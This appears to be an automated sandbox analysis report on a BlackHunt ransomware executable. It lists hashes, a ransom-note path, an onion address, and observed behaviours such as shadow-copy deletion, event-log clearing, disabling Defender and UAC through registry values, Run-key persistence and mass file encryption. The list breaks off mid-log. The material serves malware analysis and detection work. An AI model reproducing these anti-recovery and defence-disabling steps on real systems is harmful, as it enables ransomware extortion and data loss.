Analysis
-
max time kernel
126s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:31
Static task
static1
Behavioral task
behavioral1
Sample
fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
Resource
win10v2004-20231222-en
General
-
Target
fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe
-
Size
707KB
-
MD5
715fcb3248681fb71545d800a6a701a5
-
SHA1
1af52a08c7b0ee1b27d1bc9f4055524d80b2123b
-
SHA256
fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87
-
SHA512
94d84d77e997926097353799eba10d33945477ca8e98ea28bd8b11715dbaffa840a9b3b37dda6c61f7540187b811c18c52dc7e42b495be16b71d757640d18efa
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1R8xvnh:6uaTmkZJ+naie5OTamgEoKxLWElh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 9524 fsutil.exe 7540 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 5404 wevtutil.exe 12124 wevtutil.exe 11360 wevtutil.exe 11664 wevtutil.exe 6368 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9304 bcdedit.exe 9368 bcdedit.exe 10564 bcdedit.exe 6400 bcdedit.exe -
Renames multiple (3368) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 9520 wbadmin.exe 8232 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\K: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\S: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\H: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\E: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\P: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\G: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\U: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\B: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\Y: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\V: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\N: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\L: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\J: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\Z: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\M: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\I: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\T: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\O: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\A: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\X: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\sv.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-down_32.svg fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan-2x.png fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-ma\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-sl\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\zlib.md fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-sl\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\ui-strings.js fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\af_get.svg fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\faf_icons.png fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_unselected_18.svg fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hr-hr\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\ui-strings.js fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ru-ru\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\logging.properties fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\#BlackHunt_ReadMe.txt fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\custom_poster.png fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\#BlackHunt_ReadMe.hta fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-sl\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sv_get.svg fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\he-il\#BlackHunt_Private.key fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4960 6964 WerFault.exe 297 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5912 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 9240 vssadmin.exe 9312 vssadmin.exe 9680 vssadmin.exe 9676 vssadmin.exe 9352 vssadmin.exe 6516 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11536 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5332 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Token: SeRestorePrivilege 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Token: SeBackupPrivilege 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Token: SeTakeOwnershipPrivilege 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Token: SeAuditPrivilege 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Token: SeSecurityPrivilege 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Token: SeIncBasePriorityPrivilege 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe Token: SeBackupPrivilege 8332 vssvc.exe Token: SeRestorePrivilege 8332 vssvc.exe Token: SeAuditPrivilege 8332 vssvc.exe Token: SeBackupPrivilege 12776 wbengine.exe Token: SeRestorePrivilege 12776 wbengine.exe Token: SeSecurityPrivilege 12776 wbengine.exe Token: SeSecurityPrivilege 5404 wevtutil.exe Token: SeBackupPrivilege 5404 wevtutil.exe Token: SeSecurityPrivilege 12124 wevtutil.exe Token: SeBackupPrivilege 12124 wevtutil.exe Token: SeSecurityPrivilege 11360 wevtutil.exe Token: SeBackupPrivilege 11360 wevtutil.exe Token: SeSecurityPrivilege 11664 wevtutil.exe Token: SeBackupPrivilege 11664 wevtutil.exe Token: SeSecurityPrivilege 6368 wevtutil.exe Token: SeBackupPrivilege 6368 wevtutil.exe Token: SeDebugPrivilege 11536 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4536 wrote to memory of 3216 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 92 PID 4536 wrote to memory of 3216 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 92 PID 4536 wrote to memory of 3008 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 94 PID 4536 wrote to memory of 3008 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 94 PID 4536 wrote to memory of 636 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 96 PID 4536 wrote to memory of 636 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 96 PID 4536 wrote to memory of 828 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 98 PID 4536 wrote to memory of 828 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 98 PID 3216 wrote to memory of 4988 3216 cmd.exe 100 PID 3216 wrote to memory of 4988 3216 cmd.exe 100 PID 4536 wrote to memory of 1940 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 101 PID 4536 wrote to memory of 1940 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 101 PID 3008 wrote to memory of 4784 3008 cmd.exe 107 PID 3008 wrote to memory of 4784 3008 cmd.exe 107 PID 4536 wrote to memory of 5112 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 106 PID 4536 wrote to memory of 5112 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 106 PID 4536 wrote to memory of 4380 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 103 PID 4536 wrote to memory of 4380 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 103 PID 636 wrote to memory of 620 636 cmd.exe 108 PID 636 wrote to memory of 620 636 cmd.exe 108 PID 4536 wrote to memory of 4228 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 109 PID 4536 wrote to memory of 4228 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 109 PID 828 wrote to memory of 2032 828 cmd.exe 111 PID 828 wrote to memory of 2032 828 cmd.exe 111 PID 4536 wrote to memory of 4300 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 112 PID 4536 wrote to memory of 4300 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 112 PID 5112 wrote to memory of 1116 5112 cmd.exe 114 PID 5112 wrote to memory of 1116 5112 cmd.exe 114 PID 4380 wrote to memory of 2208 4380 cmd.exe 115 PID 4380 wrote to memory of 2208 4380 cmd.exe 115 PID 4536 wrote to memory of 3256 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 116 PID 4536 wrote to memory of 3256 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 116 PID 1940 wrote to memory of 3660 1940 cmd.exe 118 PID 1940 wrote to memory of 3660 1940 cmd.exe 118 PID 4228 wrote to memory of 1316 4228 cmd.exe 120 PID 4228 wrote to memory of 1316 4228 cmd.exe 120 PID 4536 wrote to memory of 3392 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 182 PID 4536 wrote to memory of 3392 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 182 PID 4300 wrote to memory of 4872 4300 cmd.exe 122 PID 4300 wrote to memory of 4872 4300 cmd.exe 122 PID 4536 wrote to memory of 2400 4536 fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe 123 PID 4536 wrote to memory of 2400 4536 